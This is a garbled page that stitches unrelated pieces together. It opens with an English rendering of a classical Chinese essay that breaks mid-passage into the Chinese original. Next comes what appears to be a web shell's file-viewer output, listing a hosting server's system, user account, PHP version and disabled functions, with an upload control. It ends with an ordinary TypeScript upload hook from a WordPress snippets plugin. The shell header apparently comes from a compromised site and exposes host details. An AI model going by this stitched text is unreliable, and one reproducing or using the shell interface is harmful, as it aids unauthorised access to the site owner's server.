As the sun rises and the forest mist clears, and the clouds return and the caves darken, these changes of light and shadow are the morning and evening in the mountains. Wildflowers bloom with their subtle fragrance, fine trees flourish with their dense shade, the wind and frost are pure and clean, and the water recedes to reveal the rocks—these are the four seasons in the mountains. Going out in the morning and returning in the evening, the scenery of the four seasons is different, and the joy is endless.至于负者歌于途,行者休于树,前者呼,后者应,伛偻提携,往来而不绝者,滁人游也。临溪而渔,溪深而鱼肥,酿泉为酒,泉香而酒洌,山肴野蔌,杂然而前陈者,太守宴也。宴酣之乐,非丝非竹,射者中,弈者胜,觥筹交错,起坐而喧哗者,众宾欢也。苍颜白发,颓然乎其间者,太守醉也。 HEX
HEX
Server: Apache
System: Linux webd003.cluster106.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User: labeautef (51223)
PHP: 8.0.30
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/labeautef/fiestaparc.net/wp-content/plugins/code-snippets/js/hooks/useFileUploadAPI.ts
import { useMemo } from 'react'
import { useAxios } from './useAxios'
import type { AxiosResponse, CreateAxiosDefaults } from 'axios'

export interface FileUploadRequest {
	files: FileList
}

export interface FileParseResponse {
	snippets: ImportableSnippet[]
	total_count: number
	message: string
	warnings?: string[]
}

export interface ImportableSnippet {
	id?: number
	name: string
	desc?: string
	description?: string
	code: string
	tags?: string[]
	scope?: string
	source_file?: string
	table_data: {
		id: number | string
		title: string
		scope: string
		tags: string
		description: string
		type: string
	}
}

export interface SnippetImportRequest {
	snippets: ImportableSnippet[]
	duplicate_action: 'ignore' | 'replace' | 'skip'
	network?: boolean
}

export interface SnippetImportResponse {
	imported: number
	imported_ids: number[]
	message: string
}

const ROUTE_BASE = `${window.CODE_SNIPPETS?.restAPI.base}code-snippets/v1/`

const AXIOS_CONFIG: CreateAxiosDefaults = {
	headers: { 'X-WP-Nonce': window.CODE_SNIPPETS?.restAPI.nonce }
}

export interface FileUploadAPI {
	parseFiles: (request: FileUploadRequest) => Promise<AxiosResponse<FileParseResponse>>
	importSnippets: (request: SnippetImportRequest) => Promise<AxiosResponse<SnippetImportResponse>>
}

export const useFileUploadAPI = (): FileUploadAPI => {
	const { axiosInstance } = useAxios(AXIOS_CONFIG)

	return useMemo((): FileUploadAPI => ({
		parseFiles: (request: FileUploadRequest) => {
			const formData = new FormData()
			
			for (let i = 0; i < request.files.length; i++) {
				formData.append('files[]', request.files[i])
			}

			return axiosInstance.post<FileParseResponse>(
				`${ROUTE_BASE}file-upload/parse`, 
				formData,
				{
					headers: {
						'Content-Type': 'multipart/form-data',
					}
				}
			)
		},
		
		importSnippets: (request: SnippetImportRequest) => {
			return axiosInstance.post<SnippetImportResponse>(
				`${ROUTE_BASE}file-upload/import`,
				request
			)
		}
	}), [axiosInstance])
}